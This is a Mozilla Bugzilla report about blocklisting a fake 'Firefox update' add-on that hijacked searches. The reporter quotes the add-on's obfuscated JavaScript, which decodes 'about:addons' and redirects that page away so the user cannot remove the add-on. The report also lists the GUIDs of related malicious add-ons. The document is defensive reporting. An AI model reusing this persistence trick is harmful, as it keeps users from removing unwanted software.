Closed Bug 1454691 Opened 7 years ago Closed 7 years ago

Malicious add-on redirects away from the add-on page to keep users from uninstalling it

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Version:
59 Branch
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: gregory.hunt, Assigned: TheOne)

Details

Attachments

(1 file)

A copy of the malicious add-on
5.63 KB, application/x-xpinstall
Details
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Build ID: 20180323154952 Steps to reproduce: A user in my office accidentally installed an add-on that billed itself as a Firefox update, which then hijacked his searches. The add-on itself makes sure you can't go to the add-ons screen in Firefox to remove it, without starting Firefox in safe mode. It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox. Here is the code it it uses to hijack the add-ons page: var tArr = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110]; var tArrI = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0]; var xtraRedirect = ""; for(var i=0; i<tArr.length; i++) xtraRedirect += String.fromCharCode(tArr[tArrI[i]]); browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) { if(changeInfo.url == xtraRedirect){ browser.tabs.update(tabId, {url: "https://www.google.com/"}); } }); Actual results: The user click on Tools->Add-ons and was redirected to Google. Expected results: The add-ons manager for Firefox should have appeared, allowing the user to remove the malicious "Update" add-on.
Severity: normal → major
Component: Untriaged → WebExtensions: Untriaged
Product: Firefox → Toolkit
Assignee: nobody → awagner
Status: UNCONFIRMED → ASSIGNED
Component: WebExtensions: Untriaged → Blocklisting
Ever confirmed: true
The add-on GUID is {6ecb9f49-90f0-43a1-8f8a-e809ea4f732b}
Found some related ones: +--------+----------------------------------------+-----------------+ | id | guid | Name | +--------+----------------------------------------+-----------------+ | 673685 | @googledashboard | GoogleDashboard | | 673890 | @smashdashboard | SmashDasboard | | 688947 | @smash_tv | SmashTV | | 689935 | @smash_mov | SmashMov | | 690271 | @smashmovs | Smashmovs | | 702315 | @smashtvs | Smashtvs | | 739853 | @FirefoxUpdate | FirefoxUpdate | | 946448 | {92b9e511-ac81-4d47-9b8f-f92dc872447e} | Big Searches | | 949744 | {3c841114-da8c-44ea-8303-78264edfe60b} | Big Searches | | 951089 | {116a0754-20eb-4fe5-bd35-575867a0b89e} | FF Update | | 952976 | {6e6ff0fd-4ae4-49ae-ac0c-e2527e12359b} | Big Search | | 960408 | {f992ac88-79d3-4960-870e-92c342ed3491} | Update | | 960411 | {6ecb9f49-90f0-43a1-8f8a-e809ea4f732b} | Update | | 962562 | {a512297e-4d3a-468c-bd1a-f77bd093f925} | NewtabTV | | 962894 | {08c28c16-9fb6-4b32-9868-db37c1668f94} | Update | | 963453 | {b4ab1a1d-e137-4c59-94d5-4f509358a81d} | Update | | 963455 | {feedf4f8-08c1-451f-a717-f08233a64ec9} | Update | +--------+----------------------------------------+-----------------+ Andreas, please stage these blocks when the staged blocks in bug 1423384 are cleared.
Flags: needinfo?(awagner)
(In reply to gregory.hunt from comment #0) > It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox. I agree, which is why I placed this in Webextensions. Andreas, an explanation would be welcome. Add-ons are prevented from interfering with Mozilla sites like addons.mozilla.org, so I would think preventing them from interfering with the Add-ons Manager would be both possible and desirable. This blocklisting game of whack-a-mole is less than ideal.
(In reply to Gingerbread Man from comment #3) > (In reply to gregory.hunt from comment #0) > > It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox. > > I agree, which is why I placed this in Webextensions. Andreas, an > explanation would be welcome. I think Jorge or Mike Conca can provide a more authoritative answer on whether we'd want to do that or now. Personally, I would be in favor of it, but it's not my call. This is also getting a little bit off-topic for this bug, maybe you can take it to dev-addons or open a separate bug?
Ooops, that should have been "...on whether we'd want to do that or not."
Flags: needinfo?(awagner)
Philipp, the block has been stage, could you please review and push?
Flags: needinfo?(philipp)
Philipp approved it. The block is live.
Status: ASSIGNED → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
(In reply to Andreas Wagner [:TheOne] [use NI] from comment #4) > open a separate bug? Bug 1455350
Flags: needinfo?(philipp)
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: